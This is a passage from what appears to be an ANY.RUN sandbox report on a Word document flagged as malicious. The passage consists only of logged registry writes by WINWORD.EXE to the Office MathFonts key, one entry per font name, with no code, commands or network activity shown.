(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSKyokashotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 19/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: @HGSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HGSSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYGothic-Extra
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYGothic-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYGraphic-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYGungSo-Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYHeadLine-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYMyeongJo-Extra
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYPMokGak-Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYPost-Light
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYPost-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYShortSamul-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @HYSinMyeongJo-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @KaiTi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Magic R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Malgun Gothic
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 20/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Meiryo
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Meiryo UI
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Microsoft JhengHei
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Microsoft YaHei
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MingLiU
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MingLiU_HKSCS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MingLiU_HKSCS-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MingLiU-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MoeumT R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MS Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MS Mincho
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MS PGothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MS PMincho
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @MS UI Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @New Gulim
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @NSimSun
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @PMingLiU
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @PMingLiU-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Pyunji R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @SimHei
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 21/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @SimSun
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @SimSun-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: @Yet R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Agency FB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Aharoni
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Algerian
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Ami R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Andalus
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Angsana New
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: AngsanaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Aparajita
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arabic Typesetting
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arial
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arial Black
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arial Narrow
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arial Rounded MT Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Arial Unicode MS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Baskerville Old Face
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Batang
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 22/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: BatangChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bauhaus 93
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bell MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Berlin Sans FB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Berlin Sans FB Demi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bernard MT Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Blackadder ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bodoni MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bodoni MT Black
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bodoni MT Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bodoni MT Poster Compressed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Book Antiqua
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bookman Old Style
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bookshelf Symbol 7
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Bradley Hand ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Britannic Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Broadway
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Browallia New
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: BrowalliaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Brush Script MT
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 23/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Calibri
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Calibri Light
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Californian FB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Calisto MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Cambria
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Cambria Math
Value: 1
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Candara
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Castellar
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Centaur
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Century
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Century Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Century Schoolbook
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Chiller
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Colonna MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Comic Sans MS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Consolas
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Constantia
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Cooper Black
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Copperplate Gothic Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Copperplate Gothic Light
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 24/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Corbel
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Cordia New
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: CordiaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Courier
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Courier New
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Curlz MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: DaunPenh
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: David
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: DFKai-SB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: DilleniaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: DokChampa
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Dotum
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: DotumChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Ebrima
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Edwardian Script ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Elephant
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Engravers MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Eras Bold ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Eras Demi ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 25/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: Eras Light ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Eras Medium ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Estrangelo Edessa
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: EucrosiaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Euphemia
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Expo M
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: FangSong
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Felix Titling
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Fixedsys
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Footlight MT Light
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Forte
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Book
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Demi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Demi Cond
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Heavy
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Franklin Gothic Medium Cond
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: FrankRuehl
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: FreesiaUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Freestyle Script
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 26/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: French Script MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gabriola
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Garamond
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gautami
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Georgia
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gigi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gill Sans MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gill Sans MT Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gill Sans MT Ext Condensed Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gill Sans Ultra Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gill Sans Ultra Bold Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gisha
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gloucester MT Extra Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Goudy Old Style
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Goudy Stout
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gulim
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: GulimChe
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Gungsuh
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: GungsuhChe
